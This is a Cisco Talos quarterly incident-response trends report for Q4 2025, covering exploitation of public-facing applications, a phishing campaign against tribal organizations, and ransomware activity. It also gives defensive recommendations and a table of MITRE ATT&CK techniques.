IR Trends Q4 2025: Exploitation remains dominant, phishing campaign targets Native American tribal organizations
Threat actors predominately exploited public-facing applications for the second quarter in a row, with this tactic appearing in nearly 40 percent of Cisco Talos Incident Response (Talos IR) engagements — a notable decrease from over 60 percent last quarter, when engagements involving ToolShell surged. This quarter included exploitation of Oracle E-Business Suite (EBS) and React2Shell, as well as the deployment of malware implants previously associated with advanced persistent threat (APT) groups.
Phishing was the second-most common tactic for initial access, and this quarter included a campaign specifically targeting Native American tribal organizations for credential harvesting. Once the adversaries compromised a legitimate account, they leverage it to send out further internal phishes and gain more credentials.
Ransomware incidents made up only approximately 13 percent of engagements this quarter, a decrease from 20 percent last quarter and a steep drop from nearly 50 percent in Q1 and Q2. Talos IR did not respond to any previously unseen ransomware variants. Qilin continues to be a dominant player in these engagements, a continuation from the previous few quarters.
Continued exploitation campaigns show the importance of timely patching
As mentioned above, threat actors exploited public-facing applications for initial access in nearly 40 percent of engagements this quarter. While there was no dominant exploitation campaign as there was last quarter with ToolShell, Talos IR did observe activity targeting Oracle EBS (CVE-2025-61882) as well as React Server Components, Next.js, and related frameworks (CVE-2025-55182 aka React2Shell). In both cases, exploitation activity occurred around the time the vulnerability became public, demonstrating actors’ speed in capitalizing on these opportunities as well as the inherent risks of internet-facing enterprise applications and default deployments embedded in widely used frameworks.
Talos IR responded to an organization that had an internet-facing server vulnerable to CVE-2025-61882. Exploitation began very shortly after the vulnerability was made public and was likely related to a large-scale campaign aiming to extort executives. After exploiting the vulnerability, the threat actors deployed multi-stage web shells related to the SAGE* infection chain.
In another incident, we observed a threat actor successfully exploit the React2Shell vulnerability to compromise the victim organization, gain shell access to the web server, and download and install XMRig Monero cryptomining malware. Cryptocurrency mining is one of the many types of operations we expect to see as threat actors race to quickly capitalize on unpatched systems. Public reporting on React2Shell exploitation also revealed targeting by state-sponsored groups, ransomware affiliates, and more, highlighting the diverse array of threat actors who look to leverage new exploits and the importance of timely patching and other mitigations, such as robust segmentation.
Exploitation activity this quarter also involved implants previously tied to APT groups. In one incident, Talos IR observed activity consistent with the BadCandy implant targeting Cisco IOS XE. The threat actors leveraged this implant to create an unauthorized account, though the activity appeared to be automated with no interactive access or additional malicious activity observed outside the router.
In an incident in which exploitation of the organization’s Cisco Secure Management Appliance (SMA) was suspected, the adversaries deployed AquaShell, a lightweight Python backdoor capable of receiving encoded commands through unauthenticated HTTP POST requests and executing them in the system shell, a backdoor which Talos has connected to UAT-9686. Similar to the incident described above, there was no follow-on activity observed. In both incidents, Talos IR commended the customers for their quick responses, which likely helped mitigate any further damage.
Phishing campaigns target Native American tribal organizations for potential credential harvesting operation
Phishing was the second-most common means of initial access this quarter, and Talos IR responded to a phishing campaign that appeared to target Native American tribal organizations.
In one incident affecting a tribal organization, Talos IR observed adversaries use compromised email accounts, alongside a legitimate but compromised web domain, to distribute lures themed around sexual harassment training. Although initial waves were unsuccessful, once the adversaries compromised an account, they used it to propagate further phishing internally and externally. In the latter phases of this campaign, the adversary leveraged a web shell directory hosted on a legitimate third-party domain to distribute phishing content and facilitate broader targeting. We suspect that the attacker gained a foothold within the victim environment due to lack of multi-factor authentication (MFA), and while no lateral movement beyond email account abuse could be confirmed, the exposure of additional accounts within the victim’s environment and external recipients indicates the potential for a wider impact.
In a second related incident affecting another tribal organization, Talos IR observed the victim receive a wave of external phishing emails, with one user targeted with numerous Outlook Web Access (OWA) login attempts, resulting in subsequent MFA prompts, one of which was approved. Afterwards, the compromised user’s account was used to issue a flood of follow-on phishing emails. After the customer removed the compromised account, the campaign continued, leveraging an external email address that was spoofed to resemble the disabled account.
Beyond similar victimology, there were overlaps in the indicators of compromise for these incidents, suggesting they may have originated from the same campaign. Both incidents also highlight a trend observed last quarter of compromised accounts being used to distribute further phishing attacks. Talos IR urges tribal organizations to be especially vigilant of this threat, scrutinizing all emails and MFA pushes.
Ransomware trends
Ransomware and pre-ransomware incidents made up just 13 percent of engagements this quarter, a decline from 20 percent last quarter, and a sharp drop from 50 percent in Q1 and Q2. Qilin ransomware, which we responded to for the first time in Q2, remains dominant and was observed in the majority of ransomware incidents, confirming our predictions in Q2 and Q3 that the group would continue to hold a heavy presence. We also responded to DragonForce ransomware, a variant we had not observed in Talos IR engagements for over a year.
Talos IR responded to a ransomware incident in which the adversary deployed multiple remote monitoring and management (RMM) tools across the attack chain. After leveraging valid accounts for initial access, they relied on ScreenConnect for persistence, SoftPerfect Network Scanner for reconnaissance, and rclone to exfiltrate data. This is a trend we have observed in other threat activity as well, such as a social engineering campaign this quarter in which the threat actors used multiple RMM tools for initial access and persistence. Relying on multiple tools can better facilitate the attack in case one is detected or blocked by security controls. In addition, because these tools may be legitimately used in an environment, they may be harder for defenders to detect in the first place.
Targeting
Consistent with last quarter, public administration was the most-targeted industry vertical. This is noteworthy as last quarter was the first time since we began publishing these reports that public administration held this position. Organizations within the public administration sector are attractive targets as they are often underfunded and use legacy equipment. These entities may have access to sensitive data as well as a low downtime tolerance, making them attractive to financially motivated and espionage-focused threat groups. We observed exploitation and phishing campaigns targeting these organizations, with one successful phishing campaign leveraging a compromised account to send out follow-on internal and external phishes, making them appear more legitimate.
Initial access
Also consistent with last quarter, the most observed means of gaining initial access was exploitation of public-facing applications, accounting for over a third of the engagements where initial access could be determined. As mentioned, this is a sharp drop from 62 percent last quarter in which widespread ToolShell exploitation occurred. Other observed means of initial access included phishing, which increased from 23 percent last quarter to 32 percent, as well as valid accounts and brute forcing.
Recommendations for addressing top security weaknesses
Conduct robust patch management
35 percent of engagements this quarter involved vulnerable or exposed infrastructure, aligning with the percentage of engagements in which Talos IR observed exploitation of publicly facing applications. This included exploitation of the React2Shell vulnerability, Oracle EBS, as well as exposed Cisco products such as Cisco IOS XE WebUI. These latter incidents underscore the importance of limiting the exposure of vulnerable and high-value servers. Though some of these vulnerabilities were older, once again highlighting the fact that adversaries can find success with years-old exploits, others were targeted right around disclosure, showing the importance of timely patching. Relatedly, there were several incidents in which exposed GitHub secrets were leveraged to access and exfiltrate sensitive data.
Implement detections to identify MFA abuse and strong MFA policies
MFA issues, including misconfigured MFA, lack of MFA, and MFA bypass, were another top security weakness this quarter, aligning with phishing being the second-most prominent initial access technique. This included issues such as a lack of MFA as well as MFA fatigue. Talos IR recommends configuring systems to monitor and alert on the following for effective MFA deployment: abuse of bypass codes, registration of new devices, creation of accounts designed to bypass or be exempt from MFA, and removal of accounts from MFA.
Configure centralized logging capabilities across the environment
Insufficient logging capabilities once again hindered investigative efforts by Talos IR. Understanding the full context and chain of events performed by an adversary on a targeted host is vital not only for remediation but also for enhancing defenses and addressing any system vulnerabilities for the future. Talos IR recommends that organizations implement a Security Information and Event Management (SIEM) solution for centralized logging. In the event an adversary deletes or modifies logs on the host, the SIEM will contain the original logs to support forensic investigation.
Timely response is paramount
Finally, several incidents this quarter revealed the value of quick responses, such as several exploitation attacks against Cisco products in which timely cooperation with Talos IR helped prevent follow-on attacks. This quarter, we also responded to a ransomware incident in which an organization delayed engaging with Talos IR, and thus were unable to prevent encryption or exfiltration of sensitive data. For more information on how timely response can dramatically improve outcomes, please see the this blog.
Top-observed MITRE ATT&CK techniques
The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
- Adversaries leveraged a wider variety of techniques for credential access this quarter compared to last quarter, including discovery of remote systems, domain trust relationships, and valid accounts.
- This was the second quarter in a row where exploitation of public-facing applications was the top initial access technique.
- Use of Remote Desktop Protocol (RDP) was the top technique for lateral movement for the second quarter in a row.
| Tactic | Technique | Example |
| Reconnaissance | T1597 Search Open Websites/Domains | Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. |
| T1018 Remote System Discovery | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network. | |
| T1482 Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. | |
| T1087 Account Discovery | Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. | |
| Initial Access | T1190 Exploit Public-Facing Application | Adversaries may exploit a vulnerability to gain access to a target system. |
| T1598 Phishing for Information | Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. | |
| T0859: Valid Accounts | Adversaries may steal and abuse the credentials of a specific user or service account using credential access techniques. | |
| T1110 Brute Force | Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. | |
| Execution | T1059 Command and Scripting Interpreter | Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. |
| T1204.001 User Execution: Malicious Link | An adversary may rely upon a user clicking a malicious link in order togain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. | |
| T1204.002 User Execution: Malicious File | An adversary may rely upon a user opening a malicious file in order to gain execution. | |
| T1078 Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts to access systems within the network and execute their payload. | |
| T1047 Windows Management Instrumentation | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. | |
| T1505.003 Server-side Web Shell | Adversaries may backdoor web servers with web shells to establish persistent access to systems. | |
| Persistence | T1136 Create Account | Adversaries may create an account to maintain access to victim systems. |
| T1219 Remote Access Tools | An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. | |
| T1059 Command and Scripting Interpreter | Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. | |
| T1053 Scheduled Task/Job | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. | |
| T1078 Valid Accounts | The adversary may compromise a valid account to move through the network to additional systems. | |
| Defense Evasion | T1562 Impair Defenses | Adversaries may maliciously modifycomponents of a victim environment in order to hinder or disable defensive mechanisms. |
| T1070 Indicator Removal | Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. | |
| T1218 System Binary Proxy Execution | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. | |
| T1564.008 Hide Artifacts: Email Hiding Rules | Adversaries may use email rules to hide inbound or outbound emails in a compromised user’s mailbox. | |
| T1112 Modify Registry | The Registry may be modified in order to hide configuration information or malicious payloads. | |
| Credential Access | T1558.003 Steal or Forge Kerberos Tickets | Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable pass the ticket. |
| T1003 OS Credential Dumping | Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. | |
| T1111 Multi-Factor Authentication Interception | Adversaries may target MFA mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. | |
| T1552.001 Unsecured Credentials | Adversaries may search compromised systems to find and obtain insecurely stored credentials. | |
| T1110 Brute Force | Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. | |
| Discovery | T1087 Account Discovery | Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. |
| T1082 System Information Discovery | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. | |
| T1083 File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. | |
| T1016 System Network Configuration Discovery | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. | |
| T1046 Network Service Discovery | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. | |
| Lateral Movement | T1021.001 Remote Services: Remote Desktop Protocol | Adversaries may use Valid Accounts to log into a computer using RDP. The adversary may then perform actions as the logged-on user. |
| T1021.002 Remote Services: SMB/Windows Admin Shares | Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. | |
| Command and Control | T1071 Application Layer Protocol | Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. |
| T1008 Fallback Channels | Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds. | |
| T1105 Ingress Tool Transfer | Adversaries may transfer tools or other files from an external system into a compromised environment. | |
| T1090 Proxy | Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. | |
| Exfiltration | T1041 Exfiltration Over C2 Channel | Adversaries may steal data by exfiltrating it over an existing command and control channel. |
| T1567 Exfiltration Over Web Service | Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. | |
| Impact | T1486 Data Encrypted for Impact | Adversaries may use ransomware to encrypt data on a target system. |
| T1485 Data Destruction | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. | |
| T1489 Service Stop | Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. | |
| Software | S1242 Qilin | A Ransomware-as-a-Service (RaaS) that has been active since at least 2022 with versions written in Golang and Rust that are capable of targeting Windows or VMWare ESXi devices. |
| S0591 ConnectWise | A legitimate remote administration tool that has been used since at least 2016 by threat actors. | |
| S1040 Rclone | A command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. | |
| S0029 PsExec | Free Microsoft tool that can remotely execute programs on a target system. |
Cisco Talos Blog – Read More
